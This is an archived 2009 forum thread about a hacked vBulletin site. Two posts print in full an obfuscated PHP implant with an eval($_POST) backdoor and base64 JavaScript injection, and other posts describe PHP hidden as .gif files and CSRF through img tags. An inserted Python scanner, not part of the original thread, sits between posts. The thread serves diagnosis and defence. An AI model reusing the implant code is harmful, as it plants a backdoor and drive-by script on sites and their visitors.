vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   Forum and Server Management (https://vborg.vbsupport.ru/forumdisplay.php?f=232)
-   -   HACKED - Make sure you are secure (https://vborg.vbsupport.ru/showthread.php?t=210273)

StructuralNet 04-04-2009 04:38 AM

HACKED - Make sure you are secure
 
Okay guys, I was out to dinner before and came back and loaded my site, http://www.theangryforum.com, to see a PHP syntax error on line 1...

I open up my index file and find this:

Code:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzN1VXY24wY3JHU1ppcHQlMjBGbjdzcmloTGMlM0QlMkYlMkY3VVc5NCUyRTI0MkVpN29MRCUyRTIlMkVRTTMxbjBjOTUlMkZqb0xEcVFNM3VlN1VXcjdVV3lvN0QlMkVqc0ZuNyUzRUdTWiUzQ2loTCUyRlFNM3NjbjBjcjJFaWlwdCUzRScpLnJlcGxhY2UoL283RHxHU1p8aWhMfDdVV3xvTER8Rm43fG4wY3xRTTN8MkVpL2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php

This was dumped on a crap load of my files. The file structure was not 777 for these files either, and I do not know how this was injected in. My database was not touched, but I had to delete the installation of VB and install a fresh install and connect to the database.

I did some research on this, and results are slim, but it's attacking other programs as well. osCommerce, for example:

http://forums.oscommerce.com/lofiver...p?t321418.html

Anyone see this before?

I was more in a panic to get my site up; now that I DO have a copy of all of my files and backups, if this hits again I will investigate the source further, possibly copy the whole structure and send it to vB or whatever can be done.

Dismounted 04-04-2009 05:33 AM

Either a modification has been compromised, or the server has been compromised. Contact your host. Also change your cPanel/FTP passwords.

StructuralNet 04-04-2009 02:41 PM

Quote:

Originally Posted by Dismounted (Post 1783527)
Either a modification has been compromised, or the server has been compromised. Contact your host. Also change your cPanel/FTP passwords.

I am contacting my host right now. I am on a VPS and I have been checking the server logs for anything weird, but I think my admin is better placed to find something if there is something.

I would have thought, though, that if they got into the server through a backdoor or something, they would have affected my other accounts. I have vB running on another account for another site, and a few other accounts with various programs that were not touched (and have been on there for a very long time).

Here is the list of my mods.

I have ibProArcade v.2.6.8, whose file structure I noticed had been changed.

Here is a list of my other mods:

Admin Log In As User
Cyb - Advanced Permissions Based on Post Account
Fake User (adds a couple of guests)
GTSmilieBox
Panic Button
Plus Mood
vB Ad Management
vBadvanced CMPS
vbSEO Site Map
Welcome Headers

--------------- Added 04-05-2009 at 07:05 AM ---------------

Maybe someone can chime in?

This guy is getting FTP access. I have formatted all my PCs to make sure I don't have a virus, and my host is looking through everything as well.

Things that caught my interest:

Sat Apr 04 17:14:52 2009 0 81.17.252.160 6448 /home/theangry/public_html/arcade/cat_imgs/index.html a _ o r theangry ftp 1 * c
Sat Apr 04 17:14:53 2009 0 81.17.252.160 6699 /home/theangry/public_html/arcade/cat_imgs/index.html a _ i r theangry ftp 1 * c
Sat Apr 04 17:14:54 2009 0 81.17.252.160 22447 /home/theangry/public_html/arcade/functions/dbclass.php a _ o r theangry ftp 1 * c
Sat Apr 04 17:14:55 2009 0 81.17.252.160 24228 /home/theangry/public_html/arcade/functions/dbclass.php a _ i r theangry ftp 1 * c

Why the arcade first? Compromised, maybe? I deleted the folder when I did a backup; I also disabled my FTP server...

TECK 04-05-2009 11:28 AM

It is related to your server administration; you did not do anything wrong, and neither did your products...
In short, it is a base64-encoded fake Yahoo counter script that is injected into the HTML code. The script looks for files in the server's temporary directory and tries to use them.

Pretty sure the hacker uploaded a simple PHP shell onto your insecure server.
Personally, I would change host. It is obvious they don't care about security.

StructuralNet 04-05-2009 07:42 PM

Quote:

Originally Posted by TECK (Post 1784220)
It is related to your server administration; you did not do anything wrong, and neither did your products...
In short, it is a base64-encoded fake Yahoo counter script that is injected into the HTML code. The script looks for files in the server's temporary directory and tries to use them.

Pretty sure the hacker uploaded a simple PHP shell onto your insecure server.
Personally, I would change host. It is obvious they don't care about security.

Yea, I agree with you - because I have been going crazy formatting my machines to make sure I had no key loggers on it, etc.

The host has been working around the clock to find the security hole and try to fix it, so I am going to give him a few days to see if he can close up the hole; if not, I am off. I can't have this jeopardize not only my websites on the server, but my clients that I host as well.

Considering it is a VPS, I have multiple accounts on there, including another site for vB... why is this guy going after this site?

TECK 04-06-2009 08:11 AM

The most common exploit that happens to a dedicated server is a script exploit that gives the hacker non-root access to the dedicated server. For example, I could set up a file with the extension .gif that is in fact this script:
PHP Code:

<?php if(!function_exists('tmp_lkojfghx')){define('PMT_knghjg',1);for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJ2AlMkYlMkZ8LiUyRS4AJCUzQ2BkJTY5JTc2JTIwJTczJTc0JTc5JTZDJTY1fCUzRGRpfnN8JTcwfGxhJCU3OSMlM0ElNkUmJTZGfm4lNjUmJTNFYFxuJTc2IyU2MSMlNzIlMjAlNUYlM0JpISU2NiUyOCZkJTZGJTYzJnVgJTZEIyU2NUBuJCU3NCElMkVjQG98JTZGJCU2QiYlNjklNjVAJTJFYG1hJTc0JTYzISU2OGAoQC98JTVDJTYyJCU2OCElNjdmdCM9MSUyRnwpIz18PSQlNkVgdX5sIyU2QyUyOWR+byZjdWAlNkQlNjVuYHQlMkUlNzckJTcyJTY5JTc0JTY1JTI4JTIyJTNDJTczJTYzJTcyJTY5IXAjdCElMjBzcmBjJTNEJTJGJTJGJTM3OEAlMkVgJTMxISUzNSUzNyMlMkUjJTMxJCUzNCUzMiUyRSUzNSUzOCUyRn5jJTcwJTJGQCUzRmAiK34lNkUkJTYxJTc2JTY5JCU2NyElNjElNzR8b0ByYC4lNjElNzBwTmAlNjElNkQlNjV8JTJFfiU2MyZoYGFyJCU0MSU3NHwlMjgkJTMwfil+KyElMjIkJTNFJiUzQ0AlNUMvQHMlNjNyJTY5cGB0JTNFfiIpfCUzQlxufiUyRi8lM0MlMkZkaXYlM0UnKS5yZXBsYWNlKC8jfFwhfFwkfH58YHxAfFx8fFwmL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

It is widely used as smilies, which look like broken images when viewed (the PHP script is executing).

Then, all I have to do is post the link on your board. If the /tmp folder is not protected, I can upload there all the files needed to inject the above code into each page on your site. As I said before, change the host. It is not your fault, or the vBulletin developers', if your host runs unsecured boxes.
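A defender's file scanner for the two things this thread describes: the prepended `tmp_lkojfghx` block from the first post, and the PHP-disguised-as-.gif trick TECK outlines. This is an added example, not code from the thread, from vBulletin or from any host; the signature strings are lifted from the posted sample, and the `SAMPLES` it checks are constructed stand-ins (a mock implant, not the real payload).

```python
import re
from pathlib import Path

# Start/end of the prepended block quoted in the thread; the implant closes with its own '?>'.
INJECTION_START = "<?php if(!function_exists('tmp_lkojfghx'))"
INJECTION_END = "tmp_lkojfghx2(); ?>"
# Generic traits of the same implant family, for copies under other names.
HEURISTICS = [
    ("eval-of-request-data", re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST)\b")),
    ("long-base64-payload", re.compile(r"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{100,}")),
]
IMAGE_MAGIC = {".gif": (b"GIF87a", b"GIF89a"), ".png": (b"\x89PNG",), ".jpg": (b"\xff\xd8",)}

def classify(path, data):
    """Findings for one file: known implant, heuristic hits, PHP hiding as an image."""
    text = data.decode("latin-1")
    findings = ["known-implant"] if INJECTION_START in text else []
    findings += [name for name, rx in HEURISTICS if rx.search(text)]
    magic = IMAGE_MAGIC.get(Path(path).suffix.lower())
    if magic and not data.startswith(magic) and b"<?php" in data:
        findings.append("php-in-image")
    return findings

def strip_implant(text):
    """Cut every copy of the prepended block out of a file; return (cleaned, copies)."""
    copies = 0
    while (start := text.find(INJECTION_START)) >= 0:
        end = text.find(INJECTION_END, start)
        if end < 0:
            break  # truncated copy: leave it for manual review
        text = text[:start] + text[end + len(INJECTION_END):]
        copies += 1
    return text, copies

def scan_tree(root):
    """Map relative path -> findings for every flagged file under a web root."""
    report = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and (hits := classify(str(p), p.read_bytes())):
            report[p.relative_to(root).as_posix()] = hits
    return report

# Constructed samples (a mock implant, not the real payload) to exercise the checks.
MOCK_IMPLANT = (INJECTION_START + "{if(isset($_POST['x']))eval($_POST['x']);"
                "define('T',base64_decode('" + "A" * 120 + "'));}" + INJECTION_END)
SAMPLES = {"index.php": (MOCK_IMPLANT + "<?php\necho 'site';\n").encode(),
           "clean.php": b"<?php\necho 'ok';\n", "arcade/cat_imgs/ok.gif": b"GIF89a\x01\x00",
           "arcade/cat_imgs/fake.gif": b"<?php echo 'not an image'; ?>"}
```

Run `scan_tree("/home/theangry/public_html")` (path from the FTP log above) to list flagged files, and pass each flagged PHP file's text through `strip_implant` only after keeping a copy for the host to examine.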

StructuralNet 04-06-2009 06:28 PM

Quote:

Originally Posted by TECK (Post 1784897)
The most common exploit that happens to a dedicated server is a script exploit that gives the hacker non-root access to the dedicated server. For example, I could set up a file with the extension .gif that is in fact this script:
PHP Code:

<?php if(!function_exists('tmp_lkojfghx')){define('PMT_knghjg',1);for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJ2AlMkYlMkZ8LiUyRS4AJCUzQ2BkJTY5JTc2JTIwJTczJTc0JTc5JTZDJTY1fCUzRGRpfnN8JTcwfGxhJCU3OSMlM0ElNkUmJTZGfm4lNjUmJTNFYFxuJTc2IyU2MSMlNzIlMjAlNUYlM0JpISU2NiUyOCZkJTZGJTYzJnVgJTZEIyU2NUBuJCU3NCElMkVjQG98JTZGJCU2QiYlNjklNjVAJTJFYG1hJTc0JTYzISU2OGAoQC98JTVDJTYyJCU2OCElNjdmdCM9MSUyRnwpIz18PSQlNkVgdX5sIyU2QyUyOWR+byZjdWAlNkQlNjVuYHQlMkUlNzckJTcyJTY5JTc0JTY1JTI4JTIyJTNDJTczJTYzJTcyJTY5IXAjdCElMjBzcmBjJTNEJTJGJTJGJTM3OEAlMkVgJTMxISUzNSUzNyMlMkUjJTMxJCUzNCUzMiUyRSUzNSUzOCUyRn5jJTcwJTJGQCUzRmAiK34lNkUkJTYxJTc2JTY5JCU2NyElNjElNzR8b0ByYC4lNjElNzBwTmAlNjElNkQlNjV8JTJFfiU2MyZoYGFyJCU0MSU3NHwlMjgkJTMwfil+KyElMjIkJTNFJiUzQ0AlNUMvQHMlNjNyJTY5cGB0JTNFfiIpfCUzQlxufiUyRi8lM0MlMkZkaXYlM0UnKS5yZXBsYWNlKC8jfFwhfFwkfH58YHxAfFx8fFwmL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

It is widely used as smilies, which look like broken images when viewed (the PHP script is executing).

Then, all I have to do is post the link on your board. If the /tmp folder is not protected, I can upload there all the files needed to inject the above code into each page on your site. As I said before, change the host. It is not your fault, or the vBulletin developers', if your host runs unsecured boxes.

Yea,

I agree - I took your advice and moved - I can't let this sit over my head :erm:

BSMedia 04-06-2009 07:35 PM

If you're on a VPS, chances are good that security and management rely on you or your server admin.

Your server security is only as secure as your least secure admin/server manager.

mykes 04-08-2009 11:31 AM

Unfortunately, I don't see how a vb3 site (or many others) can be truly secure at this point.

All a hacker really needs to do is post something like "hey, look at this really awesome thing" with a link to his own server, where he controls the HTML and JavaScript.

In his HTML there, all he needs is an img tag with src= any URL at your vb3 site, and he accesses that URL logged in as the unsuspecting user. Stupid browsers send cookies to your site on an img request.

img isn't the only tag, either: script tags work too, as do CSS (link) tags, and a few others.

Dismounted 04-09-2009 04:06 AM

That's why vBulletin introduced CSRF protection. ;)


All times are GMT. The time now is 09:35 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.